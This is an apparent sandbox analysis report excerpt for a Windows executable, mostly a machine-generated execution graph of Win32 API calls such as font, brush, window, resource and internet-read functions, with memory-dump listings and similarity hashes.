                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: FindHandleModuleResource
                                                                              • String ID: RTL
                                                                              • API String ID: 3537982541-834975271
                                                                              • Opcode ID: ce427d09586903e290345af2dc0f62e4d7201bbf0678b8d3c032c8f8bec66577
                                                                              • Instruction ID: 0b730a1b1dcffa54c4be3357da8eb771bff5e8f929a91b1582a297cf89317111
                                                                              • Opcode Fuzzy Hash: ce427d09586903e290345af2dc0f62e4d7201bbf0678b8d3c032c8f8bec66577
                                                                              • Instruction Fuzzy Hash: 4BC0123124435056EA7027757C0DB832EA85B1071EF150458BE01DA2C0DAE5C8C48671

                                                                              Execution Graph

                                                                              Execution Coverage:2.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:2.8%
                                                                              Total number of Nodes:1138
                                                                              Total number of Limit Nodes:93
                                                                              execution_graph 64494 e86f69 64495 e86f88 64494->64495 64496 e86f70 64494->64496 64499 e86fa8 64495->64499 64506 e87f24 64495->64506 64502 e87eeb 64496->64502 64514 fcba28 64499->64514 64505 e87ef7 64502->64505 64504 e87f1c 64504->64495 64505->64504 64517 e87e25 64505->64517 64508 e87f42 64506->64508 64507 e87fbc 64509 fcb27c ___crtLCMapStringA 5 API calls 64507->64509 64508->64507 64540 e881ce 64508->64540 64511 e87fcd 64509->64511 64511->64499 64513 e881ce 16 API calls 64513->64507 64515 fcb27c ___crtLCMapStringA 5 API calls 64514->64515 64516 fcba33 64515->64516 64516->64516 64522 ea7900 64517->64522 64520 e87e4e 64532 fcb27c 64520->64532 64521 e87ee9 64521->64505 64523 ea7938 DecodePointer 64522->64523 64524 ea790d GetModuleHandleW 64522->64524 64527 ea7941 64523->64527 64525 ea791c GetProcAddress EncodePointer 64524->64525 64526 ea795d 64524->64526 64525->64527 64529 ea796e GetLocaleInfoW 64526->64529 64527->64526 64528 ea7945 GetLocaleInfoEx 64527->64528 64531 ea7976 64528->64531 64529->64531 64531->64520 64533 fcb285 64532->64533 64534 fcb287 IsProcessorFeaturePresent 64532->64534 64533->64521 64536 fcbeb3 64534->64536 64539 fcbe77 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64536->64539 64538 fcbf96 64538->64521 64539->64538 64542 e881da 64540->64542 64541 e88201 LoadLibraryExW 64556 e8823c 64541->64556 64542->64541 64547 e8827b 64542->64547 64545 e87fa9 64545->64507 64545->64513 64548 e8829a 64547->64548 64549 e8828a OutputDebugStringA 64547->64549 64550 e882ab 64548->64550 64555 e881fd 64548->64555 64564 e8839a 64548->64564 64549->64548 64554 e882c6 GetLastError 64550->64554 64586 e880b7 ActivateActCtx DeactivateActCtx GetProcAddress 64550->64586 64553 e882bd 64553->64554 64553->64555 64554->64555 64555->64541 64555->64545 64557 e88245 64556->64557 64558 e8827a 64557->64558 64559 e88259 GetLastError 64557->64559 64560 e88263 64557->64560 64558->64545 64559->64560 64608 e8813f DeactivateActCtx DeactivateActCtx GetProcAddress 64560->64608 64562 e8826f 64562->64558 64563 e88273 SetLastError 64562->64563 64563->64558 64566 e883a9 64564->64566 64565 e88542 64565->64550 64566->64565 64587 e88348 64566->64587 64571 e88504 64571->64565 64606 e88182 FindActCtxSectionStringW DeactivateActCtx GetProcAddress 64571->64606 64574 e8852b 64575 e8852f LoadLibraryW 64574->64575 64576 e88536 64574->64576 64575->64576 64607 e88559 DeactivateActCtx DeactivateActCtx GetProcAddress 64576->64607 64578 e88437 GetModuleFileNameW 64578->64565 64579 e88458 64578->64579 64580 e88469 64579->64580 64581 e8845c SetLastError 64579->64581 64599 e880fa 64580->64599 64581->64565 64584 e884b5 GetLastError 64585 e884c2 64584->64585 64585->64565 64605 e880b7 ActivateActCtx DeactivateActCtx GetProcAddress 64585->64605 64586->64553 64588 e8836a 64587->64588 64589 e88356 64587->64589 64591 e88393 QueryActCtxW 64588->64591 64592 e88395 64588->64592 64590 e882f6 2 API calls 64589->64590 64590->64588 64591->64592 64592->64565 64592->64585 64593 e882f6 64592->64593 64594 e88320 GetProcAddress 64593->64594 64595 e88306 DeactivateActCtx 64593->64595 64596 e8832c 64594->64596 64595->64596 64598 e8831e 64595->64598 64596->64565 64596->64578 64598->64594 64600 e88108 64599->64600 64601 e8811c 64599->64601 64602 e882f6 2 API calls 64600->64602 64603 e88138 CreateActCtxWWorker 64601->64603 64604 e88122 64601->64604 64602->64601 64603->64604 64604->64584 64604->64585 64605->64571 64606->64574 64607->64565 64608->64562 64609 e8106b 64614 e965c2 64609->64614 64611 e81070 64618 fcb512 16 API calls __onexit 64611->64618 64613 e8107a 64615 e965ce __EH_prolog3 64614->64615 64619 e973fe 64615->64619 64617 e967b7 Concurrency::details::ExternalContextBase::~ExternalContextBase 64617->64611 64618->64613 64620 e9741f _memcpy_s 64619->64620 64629 e974a6 64619->64629 64622 e9744f VerSetConditionMask VerSetConditionMask VerifyVersionInfoA KiUserCallbackDispatcher 64620->64622 64621 fcb27c ___crtLCMapStringA 5 API calls 64623 e974b9 64621->64623 64630 e97ea2 64622->64630 64623->64617 64625 e97498 64707 e97968 64625->64707 64629->64621 64795 fcba4a 64630->64795 64632 e97eae GetSysColor 64633 e97ec3 GetSysColor 64632->64633 64634 e97ecf GetSysColor 64632->64634 64633->64634 64636 e97ef2 64634->64636 64637 e97ee6 GetSysColor 64634->64637 64796 e99951 64636->64796 64637->64636 64639 e97f08 22 API calls 64640 e9803d GetSysColor 64639->64640 64641 e98032 64639->64641 64642 e98053 GetSysColorBrush 64640->64642 64641->64642 64643 e98069 GetSysColorBrush 64642->64643 64644 e982b8 64642->64644 64643->64644 64645 e9807c GetSysColorBrush 64643->64645 64838 e990da 64644->64838 64645->64644 64647 e9808f 64645->64647 64804 e9a307 64647->64804 64650 e9809c CreateSolidBrush 64809 e9a197 64650->64809 64653 e9a307 2 API calls 64654 e980ba CreateSolidBrush 64653->64654 64655 e9a197 RaiseException 64654->64655 64656 e980cb 64655->64656 64657 e9a307 2 API calls 64656->64657 64658 e980d8 CreateSolidBrush 64657->64658 64659 e9a197 RaiseException 64658->64659 64660 e980e9 64659->64660 64661 e9a307 2 API calls 64660->64661 64662 e980f6 CreateSolidBrush 64661->64662 64663 e9a197 RaiseException 64662->64663 64664 e9810a 64663->64664 64665 e9a307 2 API calls 64664->64665 64666 e98117 CreateSolidBrush 64665->64666 64667 e9a197 RaiseException 64666->64667 64668 e98128 64667->64668 64669 e9a307 2 API calls 64668->64669 64670 e98135 CreateSolidBrush 64669->64670 64671 e9a197 RaiseException 64670->64671 64672 e98146 64671->64672 64673 e9a307 2 API calls 64672->64673 64674 e98153 CreateSolidBrush 64673->64674 64675 e9a197 RaiseException 64674->64675 64676 e98164 64675->64676 64677 e9a307 2 API calls 64676->64677 64678 e98171 CreatePen 64677->64678 64679 e9a197 RaiseException 64678->64679 64680 e98188 64679->64680 64681 e9a307 2 API calls 64680->64681 64682 e98195 CreatePen 64681->64682 64683 e9a197 RaiseException 64682->64683 64684 e981ac 64683->64684 64685 e9a307 2 API calls 64684->64685 64686 e981b9 CreatePen 64685->64686 64687 e9a197 RaiseException 64686->64687 64688 e981d0 64687->64688 64689 e981e7 64688->64689 64694 e9a307 2 API calls 64688->64694 64690 e981f0 CreateSolidBrush 64689->64690 64691 e98254 64689->64691 64692 e9a197 RaiseException 64690->64692 64832 e96e42 7 API calls 2 library calls 64691->64832 64695 e98252 64692->64695 64694->64689 64815 ec8847 64695->64815 64696 e9825e 64696->64644 64697 e98262 64696->64697 64698 e9a197 RaiseException 64697->64698 64700 e9827b CreatePatternBrush 64698->64700 64703 e9a197 RaiseException 64700->64703 64705 e9828c 64703->64705 64704 e982b2 Concurrency::details::ExternalContextBase::~ExternalContextBase 64704->64625 64833 e823e0 64705->64833 64708 e97977 __EH_prolog3_GS 64707->64708 64709 e99951 2 API calls 64708->64709 64710 e97986 GetDeviceCaps 64709->64710 64713 e979c7 64710->64713 64711 e97a02 64712 e97a20 64711->64712 64717 e9a37b RaiseException 64711->64717 64714 e97a3e 64712->64714 64721 e9a37b RaiseException 64712->64721 64713->64711 64715 e9a37b RaiseException 64713->64715 64718 e97a5c 64714->64718 64724 e9a37b RaiseException 64714->64724 64716 e979fb DeleteObject 64715->64716 64716->64711 64720 e97a19 DeleteObject 64717->64720 64719 e97a7a 64718->64719 64725 e9a37b RaiseException 64718->64725 64722 e97a98 64719->64722 64730 e9a37b RaiseException 64719->64730 64720->64712 64723 e97a37 DeleteObject 64721->64723 64726 e97ab6 64722->64726 64733 e9a37b RaiseException 64722->64733 64723->64714 64727 e97a55 DeleteObject 64724->64727 64729 e97a73 DeleteObject 64725->64729 64728 e97ad4 64726->64728 64734 e9a37b RaiseException 64726->64734 64727->64718 64731 e97af2 64728->64731 64738 e9a37b RaiseException 64728->64738 64729->64719 64732 e97a91 DeleteObject 64730->64732 64735 e97b10 64731->64735 64742 e9a37b RaiseException 64731->64742 64732->64722 64736 e97aaf DeleteObject 64733->64736 64737 e97acd DeleteObject 64734->64737 64875 e97351 64735->64875 64736->64726 64737->64728 64741 e97aeb DeleteObject 64738->64741 64740 e97b28 _memcpy_s 64744 e97b35 GetTextCharsetInfo 64740->64744 64741->64731 64743 e97b09 DeleteObject 64742->64743 64743->64735 64745 e97b6d lstrcpyA 64744->64745 64747 e97c0a CreateFontIndirectA 64745->64747 64748 e97b9e 64745->64748 64749 e9a197 RaiseException 64747->64749 64748->64747 64750 e97ba7 EnumFontFamiliesA 64748->64750 64755 e97c1c 64749->64755 64751 e97bd8 EnumFontFamiliesA 64750->64751 64752 e97bc3 lstrcpyA 64750->64752 64753 e97bf7 lstrcpyA 64751->64753 64752->64747 64753->64747 64756 e97c5b CreateFontIndirectA 64755->64756 64757 e9a197 RaiseException 64756->64757 64758 e97c6d 64757->64758 64759 e97351 SystemParametersInfoA 64758->64759 64760 e97c88 CreateFontIndirectA 64759->64760 64761 e9a197 RaiseException 64760->64761 64762 e97cb0 CreateFontIndirectA 64761->64762 64763 e9a197 RaiseException 64762->64763 64764 e97cdc CreateFontIndirectA 64763->64764 64765 e9a197 RaiseException 64764->64765 64766 e97cfd GetSystemMetrics lstrcpyA CreateFontIndirectA 64765->64766 64767 e9a197 RaiseException 64766->64767 64768 e97d39 GetStockObject 64767->64768 64769 e97ddc GetStockObject 64768->64769 64770 e97d63 GetObjectA 64768->64770 64878 e9a480 64769->64878 64770->64769 64771 e97d74 lstrcpyA CreateFontIndirectA 64770->64771 64773 e9a197 RaiseException 64771->64773 64775 e97dc3 CreateFontIndirectA 64773->64775 64774 e97dea GetObjectA CreateFontIndirectA 64776 e9a197 RaiseException 64774->64776 64777 e9a197 RaiseException 64775->64777 64778 e97e13 CreateFontIndirectA 64776->64778 64777->64769 64779 e9a197 RaiseException 64778->64779 64780 e97e34 64779->64780 64899 e982be 64780->64899 64782 e97e76 64785 e823e0 7 API calls 64782->64785 64783 e97e3b 64783->64782 64784 e97e9c 64783->64784 64917 ea0254 64783->64917 64786 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 64784->64786 64787 e97e8b 64785->64787 64790 e97ea1 64786->64790 64788 e99a90 3 API calls 64787->64788 64791 e97e96 64788->64791 64792 fcba28 std::_Locinfo::_Locinfo_dtor 5 API calls 64791->64792 64793 e9749f 64792->64793 64794 e97565 8 API calls 64793->64794 64794->64629 64795->64632 64797 e9995d __EH_prolog3 64796->64797 64798 e99980 GetWindowDC 64797->64798 64841 e9a155 64798->64841 64801 e99996 Concurrency::details::ExternalContextBase::~ExternalContextBase 64801->64639 64805 e9a30d 64804->64805 64806 e9a310 64804->64806 64805->64650 64850 e9a37b 64806->64850 64808 e9a315 DeleteObject 64808->64650 64810 e9a1a4 64809->64810 64814 e980ad 64809->64814 64855 e9ae11 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 64810->64855 64812 e9a1ae 64856 f3651f RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 64812->64856 64814->64653 64816 ec8850 64815->64816 64826 e982a0 64815->64826 64816->64826 64857 eb7d70 DeleteObject RaiseException 64816->64857 64818 ec8863 64858 eb7d70 DeleteObject RaiseException 64818->64858 64820 ec886d 64859 eb7d70 DeleteObject RaiseException 64820->64859 64822 ec8877 64860 eb7d70 DeleteObject RaiseException 64822->64860 64824 ec8881 64861 eb7d70 DeleteObject RaiseException 64824->64861 64827 e99a90 64826->64827 64862 e9a33e 64827->64862 64829 e99ac0 ReleaseDC 64866 e999f5 64829->64866 64832->64696 64834 e9a307 2 API calls 64833->64834 64835 e82423 64834->64835 64836 fcb27c ___crtLCMapStringA 5 API calls 64835->64836 64837 e8243b 64836->64837 64837->64695 64872 fced47 64838->64872 64840 e990f3 64842 e9a162 64841->64842 64846 e99992 64841->64846 64848 e9ad9e RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 64842->64848 64844 e9a16d 64849 f3651f RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 64844->64849 64846->64801 64847 e9a121 RaiseException __CxxThrowException@8 64846->64847 64848->64844 64849->64846 64851 e9a38d 64850->64851 64852 e9a386 64850->64852 64851->64808 64854 e9ae11 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 64852->64854 64854->64851 64855->64812 64856->64814 64857->64818 64858->64820 64859->64822 64860->64824 64861->64826 64863 e9a34a 64862->64863 64864 e9a351 64862->64864 64871 e9ad9e RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 64863->64871 64864->64829 64867 e99a2f 64866->64867 64868 e99a23 64866->64868 64867->64704 64869 e9a33e RaiseException 64868->64869 64870 e99a28 DeleteDC 64869->64870 64870->64867 64871->64864 64874 fced67 RaiseException 64872->64874 64874->64840 64876 e97360 SystemParametersInfoA 64875->64876 64876->64740 64922 e9ae11 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 64878->64922 64880 e9a48a __EH_prolog3_catch 64892 f36ade Concurrency::details::ExternalContextBase::~ExternalContextBase 64880->64892 64923 f366bc RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 64880->64923 64882 f36af1 64882->64892 64924 f366bc RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 64882->64924 64884 f36afe Concurrency::details::ExternalContextBase::~ExternalContextBase 64884->64892 64925 fa00f3 RaiseException 64884->64925 64886 f36b2d 64887 f36b84 64886->64887 64888 f36b34 64886->64888 64927 e990f4 RaiseException __CxxThrowException@8 64887->64927 64926 f3651f RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 64888->64926 64892->64774 64900 e982ca __EH_prolog3_GS 64899->64900 64901 e99951 2 API calls 64900->64901 64902 e982d6 64901->64902 64928 e9a9c4 64902->64928 64905 e9837d 64907 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 64905->64907 64906 e982f3 GetTextMetricsA 64908 e9a9c4 3 API calls 64906->64908 64909 e98382 64907->64909 64910 e98334 GetTextMetricsA 64908->64910 64911 e9a9c4 3 API calls 64910->64911 64912 e9836f 64911->64912 64913 e99a90 3 API calls 64912->64913 64914 e98377 64913->64914 64915 fcba28 std::_Locinfo::_Locinfo_dtor 5 API calls 64914->64915 64916 e9837c 64915->64916 64916->64783 64936 ea3f4c 64917->64936 64919 ea026f 64919->64783 64920 ea0260 64920->64919 64942 f366bc RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 64920->64942 64922->64880 64923->64882 64924->64884 64925->64886 64926->64892 64929 e9a9db SelectObject 64928->64929 64930 e9a9f3 64928->64930 64929->64930 64932 e9aa08 64930->64932 64934 e9a9fe SelectObject 64930->64934 64933 e9a480 RaiseException 64932->64933 64935 e982e9 64933->64935 64934->64932 64935->64905 64935->64906 64937 ea3f58 __EH_prolog3 64936->64937 64943 e9d51a 64937->64943 64939 ea3f5d Concurrency::details::ExternalContextBase::~ExternalContextBase 64940 ea3fa3 Concurrency::details::ExternalContextBase::~ExternalContextBase 64939->64940 64948 f36848 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 ~refcount_ptr 64939->64948 64940->64920 64942->64919 64944 e990da 64943->64944 64945 e9d534 64944->64945 64946 fced47 __CxxThrowException@8 RaiseException 64944->64946 64945->64939 64947 e990f3 64946->64947 64948->64940 64949 e95ded 64950 e9d4e7 64949->64950 64951 e95df2 FindResourceA LoadResource 64950->64951 64952 e95e18 LockResource 64951->64952 64953 e95e24 Concurrency::details::ExternalContextBase::~ExternalContextBase 64951->64953 64952->64953 64954 e9e06e 64955 e9e07a 64954->64955 64956 e9e0c2 64954->64956 64955->64956 64958 e9e081 64955->64958 64957 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 64956->64957 64959 e9e0c7 64957->64959 64964 e86020 FindResourceW 64958->64964 64961 e9e092 64962 e9e09a 64961->64962 64963 e9e0a2 WideCharToMultiByte 64961->64963 64963->64962 64965 e86049 LoadResource 64964->64965 64966 e86045 64964->64966 64967 e8605f LockResource 64965->64967 64969 e86056 64965->64969 64966->64961 64968 e8606c SizeofResource 64967->64968 64967->64969 64968->64969 64969->64961 64970 f44d39 64971 f44d78 64970->64971 64972 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 64971->64972 64973 f44d7d SetErrorMode SetErrorMode 64972->64973 64974 f44d9b 64973->64974 64975 f44dd5 64974->64975 64977 e9be5e 64974->64977 64978 e9be63 64977->64978 64979 e9be8b 64978->64979 64982 e9d53b 64978->64982 64979->64975 64983 e990da 64982->64983 64984 e9be6f GetCurrentThreadId SetWindowsHookExA 64983->64984 64985 fced47 __CxxThrowException@8 RaiseException 64983->64985 64984->64979 64986 e990f3 64985->64986 64987 e9e639 64988 e9e66c 64987->64988 64989 e9e6b3 64988->64989 65022 ea3ae7 GetWindowRect GetWindowLongA 64988->65022 64997 ea342a 64989->64997 64995 e9e6ed 65023 fcba39 5 API calls ___crtLCMapStringA 64995->65023 64998 ea3453 64997->64998 65024 e9fe2b 64998->65024 65032 ea2081 64998->65032 65038 ea1b4f 64998->65038 64999 ea3457 65000 e9e6d4 64999->65000 65088 e9fdd2 64999->65088 65000->64995 65005 ea3a3c 65000->65005 65006 ea3ad7 65005->65006 65007 ea3a59 65005->65007 65009 fcb27c ___crtLCMapStringA 5 API calls 65006->65009 65205 ea562b 65007->65205 65011 ea3ae3 65009->65011 65010 ea3a60 65010->65006 65012 ea3a67 GetWindowRect 65010->65012 65011->64995 65012->65006 65013 ea3a8d 65012->65013 65013->65006 65014 ea3a95 GetWindow 65013->65014 65015 ea022a 2 API calls 65014->65015 65016 ea3aa6 65015->65016 65017 ea3ab1 65016->65017 65018 ea579d IsWindowEnabled 65016->65018 65017->65006 65208 e95972 65017->65208 65018->65017 65022->64989 65025 e9fe3e 65024->65025 65026 e9fe64 65025->65026 65027 e9fe44 65025->65027 65028 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65026->65028 65031 e9fdd2 2 API calls 65027->65031 65029 e9fe69 65028->65029 65030 e9fe61 65030->64999 65031->65030 65033 ea2089 65032->65033 65094 e83400 IsIconic 65033->65094 65034 ea208d 65036 ea2395 Concurrency::details::ExternalContextBase::~ExternalContextBase 65034->65036 65107 f3d600 65034->65107 65036->64999 65042 ea1b5e __EH_prolog3 65038->65042 65039 ea1bf4 65040 ea1c49 65039->65040 65041 ea1c36 65039->65041 65081 ea1b7a 65039->65081 65044 ea1c46 65040->65044 65046 ea1bc9 65040->65046 65141 ea022a 65041->65141 65042->65039 65042->65046 65042->65081 65140 ea099c 16 API calls ___crtLCMapStringA 65042->65140 65044->65040 65149 ea395a 10 API calls 65044->65149 65045 ea1c5e 65045->65046 65045->65081 65150 e9ff03 58 API calls 2 library calls 65045->65150 65046->65045 65052 ea1cd9 65046->65052 65046->65081 65049 ea2395 Concurrency::details::ExternalContextBase::~ExternalContextBase 65049->64999 65051 f3d600 ~refcount_ptr 2 API calls 65051->65049 65053 ea1d50 65052->65053 65151 ea0522 RaiseException 65052->65151 65126 ea0cc1 65053->65126 65056 ea1cf2 65056->65052 65059 ea1d16 65059->65053 65062 ea1d40 RedrawWindow 65059->65062 65060 ea2366 65063 f3d600 ~refcount_ptr 2 API calls 65060->65063 65060->65081 65061 ea1d79 65064 f3d600 ~refcount_ptr 2 API calls 65061->65064 65072 ea1da8 65061->65072 65062->65053 65063->65081 65064->65072 65065 ea1ea0 65135 e9d075 65065->65135 65066 ea200a 65071 ea022a 2 API calls 65066->65071 65067 ea1e98 65152 e9a46e RaiseException 65067->65152 65068 ea1f1d 65070 ea022a 2 API calls 65068->65070 65069 ea1ef6 65075 ea022a 2 API calls 65069->65075 65070->65081 65071->65081 65072->65060 65072->65065 65072->65066 65072->65067 65072->65068 65072->65069 65073 ea2320 65072->65073 65076 f3d600 ~refcount_ptr 2 API calls 65072->65076 65077 ea1f32 65072->65077 65079 ea1fcc 65072->65079 65072->65081 65078 f3d600 ~refcount_ptr 2 API calls 65073->65078 65073->65081 65075->65081 65076->65072 65080 ea0254 RaiseException 65077->65080 65078->65081 65084 e999f5 2 API calls 65079->65084 65082 ea1f79 65080->65082 65081->65049 65081->65051 65083 ea1f92 65082->65083 65153 f366bc RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65082->65153 65154 e9e3b0 DestroyWindow RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase _AnonymousOriginator 65083->65154 65084->65081 65089 e9fdef 65088->65089 65090 e9fdde CallWindowProcA 65088->65090 65089->65090 65093 e9fe17 DefWindowProcA 65089->65093 65092 e9fe26 65090->65092 65092->65000 65093->65092 65095 e8342a _memcpy_s 65094->65095 65096 e834cb 65094->65096 65122 e998b2 BeginPaint RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 65095->65122 65112 e96302 65096->65112 65100 fcb27c ___crtLCMapStringA 5 API calls 65102 e834e0 65100->65102 65101 e83445 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 65123 e99a3c DeleteDC EndPaint RaiseException 65101->65123 65102->65034 65104 e834b9 65105 fcb27c ___crtLCMapStringA 5 API calls 65104->65105 65106 e834c7 65105->65106 65106->65034 65108 f3d60b LeaveCriticalSection 65107->65108 65109 f3d61e 65107->65109 65108->65036 65110 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65109->65110 65111 f3d623 65110->65111 65113 e9630e __EH_prolog3_GS 65112->65113 65124 e998b2 BeginPaint RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 65113->65124 65115 e96319 65116 e96333 65115->65116 65117 e9fe2b 3 API calls 65115->65117 65125 e99a3c DeleteDC EndPaint RaiseException 65116->65125 65117->65116 65119 e9633b 65120 fcba28 std::_Locinfo::_Locinfo_dtor 5 API calls 65119->65120 65121 e834d2 65120->65121 65121->65100 65122->65101 65123->65104 65124->65115 65125->65119 65127 ea0cd0 65126->65127 65128 ea0cea 65127->65128 65129 ea0ce0 65127->65129 65131 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65128->65131 65155 f3d58c 65129->65155 65133 ea0cef 65131->65133 65132 ea0ce6 65132->65061 65134 ea0d10 MessageBoxA 65133->65134 65134->65061 65167 e9b072 65135->65167 65138 e9d0a9 65138->65081 65139 e9fdd2 2 API calls 65139->65138 65140->65039 65142 ea3f4c Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65141->65142 65143 ea0236 65142->65143 65174 f36ac9 65143->65174 65145 ea0242 65194 ea5000 65145->65194 65148 ea38e5 9 API calls 65148->65044 65149->65045 65150->65056 65151->65059 65153->65083 65154->65079 65156 f3d5fa 65155->65156 65157 f3d599 65155->65157 65159 e990da Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 65156->65159 65158 f3d5a7 65157->65158 65166 f3d523 InitializeCriticalSection 65157->65166 65161 f3d5b6 EnterCriticalSection 65158->65161 65162 f3d5e8 EnterCriticalSection 65158->65162 65163 f3d5ff 65159->65163 65164 f3d5e0 LeaveCriticalSection 65161->65164 65165 f3d5cd InitializeCriticalSection 65161->65165 65162->65132 65164->65162 65165->65164 65166->65158 65168 e9b084 65167->65168 65171 ea579d 65168->65171 65170 e9b092 65170->65139 65172 ea57b0 65171->65172 65173 ea57a5 IsWindowEnabled 65171->65173 65172->65170 65173->65170 65175 f36ad5 __EH_prolog3_catch 65174->65175 65191 f36ade Concurrency::details::ExternalContextBase::~ExternalContextBase 65175->65191 65199 f366bc RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65175->65199 65177 f36af1 65177->65191 65200 f366bc RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65177->65200 65179 f36afe Concurrency::details::ExternalContextBase::~ExternalContextBase 65179->65191 65201 fa00f3 RaiseException 65179->65201 65181 f36b2d 65182 f36b84 65181->65182 65183 f36b34 65181->65183 65203 e990f4 RaiseException __CxxThrowException@8 65182->65203 65202 f3651f RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65183->65202 65191->65145 65195 ea500a 65194->65195 65198 ea024c 65194->65198 65196 ea5010 GetParent 65195->65196 65195->65198 65204 f366bc RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65196->65204 65198->65148 65199->65177 65200->65179 65201->65181 65202->65191 65204->65198 65206 ea5633 GetWindowLongA 65205->65206 65207 ea5640 65205->65207 65206->65010 65207->65010 65209 e95993 65208->65209 65210 e959b5 65208->65210 65212 e95998 FindResourceA LoadResource 65209->65212 65211 e959b9 LockResource 65210->65211 65215 e959c5 65210->65215 65211->65215 65212->65210 65213 e95a19 65213->65006 65216 e9f8b6 65213->65216 65214 e95a12 FreeResource 65214->65213 65215->65213 65215->65214 65217 ea562b GetWindowLongA 65216->65217 65218 e9f8d6 65217->65218 65219 e9f8dc 65218->65219 65221 e9f8fa GetWindow 65218->65221 65222 e9f8ef GetParent 65218->65222 65220 e9f925 GetWindowRect 65219->65220 65224 e9f9ed GetParent GetClientRect GetClientRect MapWindowPoints 65220->65224 65225 e9f964 65220->65225 65223 e9f905 65221->65223 65222->65223 65223->65220 65226 e9f90d SendMessageA 65223->65226 65234 e9fa1c 65224->65234 65227 e9f968 GetWindowLongA 65225->65227 65228 e9f983 65225->65228 65226->65220 65229 e9f923 65226->65229 65227->65228 65230 e9f9be GetWindowRect MonitorFromWindow GetMonitorInfoA 65228->65230 65231 e9f98e 65228->65231 65229->65220 65232 e9f9dd CopyRect 65230->65232 65245 e867a6 65231->65245 65232->65234 65241 ea5bad 65234->65241 65239 fcb27c ___crtLCMapStringA 5 API calls 65240 e9faab 65239->65240 65240->65006 65242 ea5bb8 SetWindowPos 65241->65242 65244 e9fa9e 65241->65244 65242->65244 65244->65239 65248 e9be55 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 65245->65248 65247 e867ac MonitorFromWindow GetMonitorInfoA CopyRect 65247->65232 65248->65247 65249 e835bb 65250 e83619 InternetCloseHandle InternetCloseHandle 65249->65250 65252 e835c5 Concurrency::details::ExternalContextBase::~ExternalContextBase 65249->65252 65251 e83686 PostMessageA 65250->65251 65263 e8362d 65250->65263 65253 e83694 65251->65253 65252->65250 65254 e835d4 GetTickCount 65252->65254 65256 fcb27c ___crtLCMapStringA 5 API calls 65253->65256 65255 e835e1 InternetReadFile 65254->65255 65257 e835fb GetTickCount 65255->65257 65262 e83616 65255->65262 65258 e836ec 65256->65258 65259 e83608 GetTickCount 65257->65259 65260 e8360d 65257->65260 65259->65260 65260->65255 65261 e83613 65260->65261 65261->65262 65262->65250 65263->65251 65263->65253 65264 e8373b 65265 e8374c 65264->65265 65270 e84a20 5 API calls _AnonymousOriginator 65265->65270 65267 e83789 std::ios_base::_Ios_base_dtor 65268 fcb27c ___crtLCMapStringA 5 API calls 65267->65268 65269 e837e3 65268->65269 65270->65267 65271 e95af2 65272 e95af7 65271->65272 65291 f1dd7c 65272->65291 65274 e95b49 Concurrency::details::ExternalContextBase::~ExternalContextBase 65275 e95b29 65275->65274 65314 f1e356 65275->65314 65277 e95ba3 65280 e95beb 65277->65280 65325 f1e307 15 API calls 65277->65325 65279 e95bb5 65326 f1e6a0 21 API calls ___crtLCMapStringA 65279->65326 65318 e964e9 65280->65318 65283 e95bc4 65327 f1e342 GlobalFree 65283->65327 65285 e95bdd 65285->65280 65286 e95be1 GlobalLock 65285->65286 65286->65280 65287 e95c16 65288 e95cbb 65287->65288 65289 e95cb2 DestroyWindow 65287->65289 65288->65274 65290 e95cbf GlobalUnlock GlobalFree 65288->65290 65289->65288 65290->65274 65328 f8fbd0 65291->65328 65294 f8fbd0 2 API calls 65295 f1dd99 65294->65295 65296 f8fbd0 2 API calls 65295->65296 65297 f1dda9 65296->65297 65298 f8fbd0 2 API calls 65297->65298 65299 f1ddb8 65298->65299 65300 f8fbd0 2 API calls 65299->65300 65301 f1ddc3 65300->65301 65302 f8fbd0 2 API calls 65301->65302 65303 f1ddce 65302->65303 65304 